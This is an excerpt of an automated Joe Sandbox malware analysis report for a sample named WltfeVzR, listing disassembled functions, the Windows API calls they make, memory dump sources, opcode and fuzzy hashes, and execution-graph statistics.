                        • Instruction Fuzzy Hash: C2114CB19002499FCB10DFAAC845BDFBFF5EF88320F248819E519A7250C7759540DFA0
                        Function 076C70F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 20b8deef2a18aba5db42720c5631860226a83d62c573dbb8423eeef1f18d2a43
                        • Instruction ID: c5038802e93b75373e56f09952076dcf71c025083017d3f21f15faeea8af797a
                        • Opcode Fuzzy Hash: 20b8deef2a18aba5db42720c5631860226a83d62c573dbb8423eeef1f18d2a43
                        • Instruction Fuzzy Hash: 6B1128B19003498BDB20DFAAC4457AEFBF5EF88324F248819D519A7340C6756944CF94
                        Function 076CAC41 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076CACA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 6db3eedd3792eb01dfb01625d6a88c68ad97fd8dcef812119f793970d4cceeaa
                        • Instruction ID: bd7edeafa69bdde9c8a5fe57f2009663a73d6974fec0979ec69064c14b1e973f
                        • Opcode Fuzzy Hash: 6db3eedd3792eb01dfb01625d6a88c68ad97fd8dcef812119f793970d4cceeaa
                        • Instruction Fuzzy Hash: 3211E3B58003499FDB10CF9AD545BDEBFF8EB48320F20881AD518A7700C375A954CFA5
                        Function 076C8168 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076CACA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 2c49b00466d46a2b098af5f8f1f32f45b87766dbf8336e61b3bf3ca90b1c33c7
                        • Instruction ID: 69ca1e334a697d00705da8c6a666fe7ef871f6e8a2e6a2c434864deac8b32d46
                        • Opcode Fuzzy Hash: 2c49b00466d46a2b098af5f8f1f32f45b87766dbf8336e61b3bf3ca90b1c33c7
                        • Instruction Fuzzy Hash: CA11F5B58003499FDB20CF9AC585BEEBBF8FB48324F208419E919A7700C375A944CFA5
                        Function 02E0F120 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0F186
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 24205294ab21b2597e4e73fde0a97e3a084de60b2b37b41120270edf5bff9785
                        • Instruction ID: f26d4f8f16fccbf6d67ddeb0ea15212cf5983f322f47ffa348a823bbabd49a56
                        • Opcode Fuzzy Hash: 24205294ab21b2597e4e73fde0a97e3a084de60b2b37b41120270edf5bff9785
                        • Instruction Fuzzy Hash: 9F1102B5C002498FCB20CF9AC944A9EFBF4EF88224F10845AD418A7641C375A945CFA1
                        Function 014DD528 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0ba471a9c50d50a1fed95522c0f4592fbc4d37bdbdddf7d39ff64793b4d6de72
                        • Instruction ID: 19e3160fb7a017db51016f41eb1fbed0174f59074c62caee9bbbd71a18d052f1
                        • Opcode Fuzzy Hash: 0ba471a9c50d50a1fed95522c0f4592fbc4d37bdbdddf7d39ff64793b4d6de72
                        • Instruction Fuzzy Hash: 382148B1904200DFDF15CF98C9E0B27BF65FB84318F20856EE90A0B2A6C336D456C7A1
                        Function 014DD43C Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31fc911f1f98ca22ea190b368fffa5e459baa7888b6a0c130a7deffd8e185f30
                        • Instruction ID: 1b61d6873976d1841506e6607c4f9784a6cfab447c7c07b4cffcffe1f8bb53a6
                        • Opcode Fuzzy Hash: 31fc911f1f98ca22ea190b368fffa5e459baa7888b6a0c130a7deffd8e185f30
                        • Instruction Fuzzy Hash: B42136B1904200EFCF15DF58C9D0B67BF65FB84324F20C57AE9090B2A6C336E446CAA1
                        Function 014ED01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195064007.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14ed000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 832d06565a2c51f23a71e4701f5f718e3fb25e4eb770e74dac1f8e3c1181857e
                        • Instruction ID: 993b1fbcd7cf5e062f8108ed190fe3011d0701f71ead02488103c28bfd6df7b4
                        • Opcode Fuzzy Hash: 832d06565a2c51f23a71e4701f5f718e3fb25e4eb770e74dac1f8e3c1181857e
                        • Instruction Fuzzy Hash: 302125B1904200DFCB15DF58D9C8B26BFA5FB84359F28C96ED90A4B366C336D407CA61
                        Function 014ED1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195064007.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14ed000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc3a165219fb7e399045b47db698e957b1998c0d94b474c7dbba63611070d560
                        • Instruction ID: 0386d017b4c8dc202791c0edcea6c83e4d9a422e2239bbdb00c3297836dad5fb
                        • Opcode Fuzzy Hash: fc3a165219fb7e399045b47db698e957b1998c0d94b474c7dbba63611070d560
                        • Instruction Fuzzy Hash: F12149B5904200EFDB05DF98C9C4B26BBE5FB84324F20C96EE9494B3A2C336D406CB61
                        Function 014ED006 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195064007.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14ed000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3cdb58c00bc57c750b07e7bdfd7955da6dcdc7da7e32672f568f8579ddef08fc
                        • Instruction ID: 66f9317fb77a0cba6e3097c655a35e460359aebbc432e77633a6715a8a1d80fc
                        • Opcode Fuzzy Hash: 3cdb58c00bc57c750b07e7bdfd7955da6dcdc7da7e32672f568f8579ddef08fc
                        • Instruction Fuzzy Hash: 1D2183755093808FDB13CF24D594716BFB1EB46218F28C5DBD8498B667C33A980ACB62
                        Function 014DD523 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction ID: 2288706a85c8df8094e122259395ee05f96c083e66f9ee7736c4125d2a836f38
                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction Fuzzy Hash: 0811E172904280CFCF16CF54D5D0B16BF72FB84314F2485AAD9090B666C33AD45ACBA1
                        Function 014DD437 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction ID: 7b16f1d3451daa80db1df02538bfa6ef525d4bff0050027d763848979791d508
                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction Fuzzy Hash: 1711E176904240DFCF16CF54D5D0B16BF72FB84314F24C5AAD8094B666C33AD45ACBA1
                        Function 014ED1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195064007.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14ed000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction ID: 5fb070d5469c4773e827a1463faf776684d22a8bf3c0211d411d82cc58a21d97
                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction Fuzzy Hash: 8C118B75904280DFDB16CF54D6C4B16BBA2FB84224F24C6AAD8494B7A6C33AD44ACB61
                        Function 014DD731 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84564d2965d3e619f846f8079fc08b9027979fe2acd036f37b9bf8cb4f3f61c7
                        • Instruction ID: e12bca0267c7f46e43b50b77b81278d29398cc1c6acb4dd0e2e76bb9a3e708cc
                        • Opcode Fuzzy Hash: 84564d2965d3e619f846f8079fc08b9027979fe2acd036f37b9bf8cb4f3f61c7
                        • Instruction Fuzzy Hash: FE01A7719043849AEB105AA9CDD4767BF98EF41324F18C9ABED494B2E2C6799840C671
                        Function 014DD730 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195018879.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_14dd000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4df9eff4b6207e707994739bbca8dc29669f4c52c34ad32e5cd9175170e756d
                        • Instruction ID: 89c4b4b33db88a67c541b4c560a4ef69b95dfd169db0b8d18b530f4ea43c3c2b
                        • Opcode Fuzzy Hash: d4df9eff4b6207e707994739bbca8dc29669f4c52c34ad32e5cd9175170e756d
                        • Instruction Fuzzy Hash: 8BF062724043849AEB118A19D9C4B67FFD8EB91734F18C59BED484F296C3799844CB71

                        Execution Graph

                        Execution Coverage:13.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:34
                        Total number of Limit Nodes:2
                        execution_graph 27923 2b50871 27927 2b508d8 27923->27927 27932 2b508c8 27923->27932 27924 2b50889 27928 2b508fa 27927->27928 27937 2b50ce0 27928->27937 27941 2b50ce8 27928->27941 27929 2b5093e 27929->27924 27933 2b508d8 27932->27933 27934 2b50ce0 GetConsoleWindow 27933->27934 27935 2b50ce8 GetConsoleWindow 27933->27935 27936 2b5093e 27934->27936 27935->27936 27936->27924 27938 2b50d26 GetConsoleWindow 27937->27938 27940 2b50d56 27938->27940 27940->27929 27942 2b50d26 GetConsoleWindow 27941->27942 27944 2b50d56 27942->27944 27944->27929 27945 6556361 27946 65562fc 27945->27946 27947 655636a 27945->27947 27946->27947 27952 65573f1 27946->27952 27956 6557390 27946->27956 27960 6557400 27946->27960 27948 655631d 27954 655738d 27952->27954 27953 6557451 27953->27948 27954->27952 27954->27953 27964 6557148 27954->27964 27957 655738d 27956->27957 27957->27956 27958 6557451 27957->27958 27959 6557148 LoadLibraryW 27957->27959 27958->27948 27959->27958 27962 6557448 27960->27962 27961 6557451 27961->27948 27962->27961 27963 6557148 LoadLibraryW 27962->27963 27963->27961 27965 65575f0 LoadLibraryW 27964->27965 27967 6557665 27965->27967 27967->27953

                        Executed Functions

                        Function 065575E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1027 65575e8-65575ea 1028 65575f2-6557630 1027->1028 1029 65575ec-65575f1 1027->1029 1031 6557632-6557635 1028->1031 1032 6557638-6557663 LoadLibraryW 1028->1032 1029->1028 1031->1032 1033 6557665-655766b 1032->1033 1034 655766c-6557689 1032->1034 1033->1034
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065574A6), ref: 06557656
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332838917.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6550000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: Mg
                        • API String ID: 1029625771-763070451
                        • Opcode ID: 54b608695de51c6f5c27102a0aa29d6763a1e41a5a8a9912e4e64042c45f93d4
                        • Instruction ID: dce1e36bf6fd3cd65edba28508a02858166c4faa9047c3e3194668c2f397013b
                        • Opcode Fuzzy Hash: 54b608695de51c6f5c27102a0aa29d6763a1e41a5a8a9912e4e64042c45f93d4
                        • Instruction Fuzzy Hash: 171133B5C002498FCB10CF9AC844ADEFBF5AB88210F11841AD829A7710C374A506CFA4
                        Function 06557148 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1037 6557148-6557630 1040 6557632-6557635 1037->1040 1041 6557638-6557663 LoadLibraryW 1037->1041 1040->1041 1042 6557665-655766b 1041->1042 1043 655766c-6557689 1041->1043 1042->1043
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065574A6), ref: 06557656
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332838917.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6550000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: Mg
                        • API String ID: 1029625771-763070451
                        • Opcode ID: e2f4a92a2e47833ac0365ed5dfdd65e30277f4732e10e535533aa38a51a37a8f
                        • Instruction ID: 46641d845dbb4c51b75ddb55a0dffde496009572ca0102d4fadb39869fb01b2d
                        • Opcode Fuzzy Hash: e2f4a92a2e47833ac0365ed5dfdd65e30277f4732e10e535533aa38a51a37a8f
                        • Instruction Fuzzy Hash: BC1112B5D003498FCB10CF9AC848B9EFBF4EF88220F15841AD829B7200D375A545CFA4
                        Function 02B50CE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1046 2b50ce0-2b50d54 GetConsoleWindow 1049 2b50d56-2b50d5c 1046->1049 1050 2b50d5d-2b50d82 1046->1050 1049->1050
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02B50D47
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2316111532.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2b50000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: Mg
                        • API String ID: 2863861424-763070451
                        • Opcode ID: 83958bdcdd067db39f001c21f227fec61bee14b959349320c70da8704d5e2cbf
                        • Instruction ID: e10a5be8d173e67ad10f361547abf4ec20e07efc7a5580c19d6739ba3ec9be37
                        • Opcode Fuzzy Hash: 83958bdcdd067db39f001c21f227fec61bee14b959349320c70da8704d5e2cbf
                        • Instruction Fuzzy Hash: 681128B5D003498FCB20DFAAC5467DEBFF5AF88324F24885AD419AB250CB796544CF90
                        Function 02B50CE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1054 2b50ce8-2b50d54 GetConsoleWindow 1057 2b50d56-2b50d5c 1054->1057 1058 2b50d5d-2b50d82 1054->1058 1057->1058
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02B50D47
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2316111532.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2b50000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: Mg
                        • API String ID: 2863861424-763070451
                        • Opcode ID: 2b41d6ba0dee0fa7dab3ed181a9a234352dcb2e587cb55791cd37b0337168db9
                        • Instruction ID: dc5a2ae218bad826b0610a2b5504acdb61796e347a413ac30ef1c3d16bcbbcf9
                        • Opcode Fuzzy Hash: 2b41d6ba0dee0fa7dab3ed181a9a234352dcb2e587cb55791cd37b0337168db9
                        • Instruction Fuzzy Hash: A31136B5D003498FCB20DFAAC44679EFFF4EF48324F20885AD419AB240CB796544CBA0
                        Function 065A1550 Relevance: 1.4, Instructions: 1422COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98be4ad99a5626626843a99e1bac8cbcf38c9f275ee7fa903f9f033be5ad4ce3
                        • Instruction ID: 062f14b16670b1042e8ad31da608c580ef2fa6adb6bfdb5eedda222dcf9aa129
                        • Opcode Fuzzy Hash: 98be4ad99a5626626843a99e1bac8cbcf38c9f275ee7fa903f9f033be5ad4ce3
                        • Instruction Fuzzy Hash: CDC23F74B006189FCB54DF68C891E9DBBB6FF89700F108099E609AB3A1DB71AE41CF55
                        Function 065A349D Relevance: 1.3, Instructions: 1283COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ce5a937b9972c0351f86c7b4cbc64bf47d6c9e2c11f50946c3c26826b6a61c6
                        • Instruction ID: e08c8046439b4ea757ee49def6d105fdaac328adf5b9058458e5d660ea788c42
                        • Opcode Fuzzy Hash: 3ce5a937b9972c0351f86c7b4cbc64bf47d6c9e2c11f50946c3c26826b6a61c6
                        • Instruction Fuzzy Hash: 9CA1AD74B002459FCB44DB68C894A6EBBF2FF89704B1084AAE516DB3A2DB35DD01CB91
                        Function 065A0048 Relevance: .7, Instructions: 664COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16522b0c1f2db49cee545c2cebb413842b9b352613e61c1e46aa902602999d86
                        • Instruction ID: a03327394685dd35a3043c7605418c589feffb3158066f7e2aa4900a6fa50894
                        • Opcode Fuzzy Hash: 16522b0c1f2db49cee545c2cebb413842b9b352613e61c1e46aa902602999d86
                        • Instruction Fuzzy Hash: FD4256B07106259FCB28EF78D49066EBBB2FFD5704F404E1CD5029B391CB76A9058B9A
                        Function 065A0000 Relevance: .4, Instructions: 356COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcf24b5027c7ed427719c7f568f07e1262fdb7718a69d47f4c3d69d1fc6fa7ab
                        • Instruction ID: 7dc61c5668d7165f681291925623a89debe604a65b78891d3227e50ff08e25a7
                        • Opcode Fuzzy Hash: fcf24b5027c7ed427719c7f568f07e1262fdb7718a69d47f4c3d69d1fc6fa7ab
                        • Instruction Fuzzy Hash: 03D19A70B212449FDB41DFA8C851A6EBBB6FF8A704F14849AE5018F3E6CB719905CB91
                        Function 065A1534 Relevance: .3, Instructions: 339COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3e64d29f2198a9e892d19f90ee0c00d6998ef0514d2375065cda24b63d5d374
                        • Instruction ID: 8a5cd4d2966238a862f69b42c519f72fa9265219a5bd6b623b034058c00a72f3
                        • Opcode Fuzzy Hash: b3e64d29f2198a9e892d19f90ee0c00d6998ef0514d2375065cda24b63d5d374
                        • Instruction Fuzzy Hash: E6C14A34B10604AFCB54CFA8D989E9DBBB2FF89700F508059FA069B761CA72EC15CB55
                        Function 065A3138 Relevance: .2, Instructions: 247COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 318ea5343253611ba3da57316cd8ecad5a2a23d331c1e2529678c289a0d6b5b5
                        • Instruction ID: 26995108c43b1e98f596a68f18c637ea079cc358f26e60c0d473304cb984de91
                        • Opcode Fuzzy Hash: 318ea5343253611ba3da57316cd8ecad5a2a23d331c1e2529678c289a0d6b5b5
                        • Instruction Fuzzy Hash: 1E914D35B102159FCB44CF69C884D9EBBF2FF89714B1580AAE905EB3A1DA71EC05CB61
                        Function 065A1308 Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13264ec07ea0adfb9f16e1438b8c083b09d881147b1915075c8088dff68c75d5
                        • Instruction ID: 187ebf393809ae202af0ee4ffa91cbda2eb25cdb5d71eacf801b5ab247603adb
                        • Opcode Fuzzy Hash: 13264ec07ea0adfb9f16e1438b8c083b09d881147b1915075c8088dff68c75d5
                        • Instruction Fuzzy Hash: 83613636B08B458FCB649F7DC84046EBBA6FFC5254B18857BD9858B211EF30C845CBA1
                        Function 065A12E8 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a65e00abaa284c06777cc0c48dcf2cd4c813dbc25b7c2d4c81dbbe4843f7869d
                        • Instruction ID: d89af6f66a5b2185fb2063e06c896b86e207cb8745a4e51b74a45eeea7b40b0b
                        • Opcode Fuzzy Hash: a65e00abaa284c06777cc0c48dcf2cd4c813dbc25b7c2d4c81dbbe4843f7869d
                        • Instruction Fuzzy Hash: 7921F7356087819FC7394F29888057EBFB6BF86260B1D4597D8859B652DB34CC41CBA1
                        Function 0122D054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315569569.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_122d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05606b2b380d9253fddd40caae9a573fe5141feee8406b4558c9dd4770106cf8
                        • Instruction ID: 175679493b3554c636724f381a7dad39290c1b06c2eaf1ae7a516d24e8af0df9
                        • Opcode Fuzzy Hash: 05606b2b380d9253fddd40caae9a573fe5141feee8406b4558c9dd4770106cf8
                        • Instruction Fuzzy Hash: C921F4B2514244EFCF15DF54D9C0B2ABF65FB88314F24C669EA090A256C37AD416CBA1
                        Function 0123D2F4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315625253.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_123d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef979caebcf4244857bd443ab01cabaaf384c982c7b589363d72eb6f0a11c30c
                        • Instruction ID: 9d451c181ff10746f0f2a84b9df191be7734b1a5e9e2bcdd07068dde629ddd9f
                        • Opcode Fuzzy Hash: ef979caebcf4244857bd443ab01cabaaf384c982c7b589363d72eb6f0a11c30c
                        • Instruction Fuzzy Hash: 5F2146F1614208DFCB01DF58D4C0B2ABB65FBC4320F60C569E9094B246C37AD806CEA1
                        Function 0122D04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315569569.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_122d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction ID: 1db45a65c689ff05a33cddaf766877799278f88d7abfb406e806ee026a6d2893
                        • Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction Fuzzy Hash: 3F21CD72404284DFCF16CF44D9C4B1ABF72FB88314F2482A9DE480A656C33AD426CB91
                        Function 0123D4C4 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315625253.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_123d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc69e413c40db1beb5534dc2d52ba4a4b32c00f54e8d39a00c58004fd9522b65
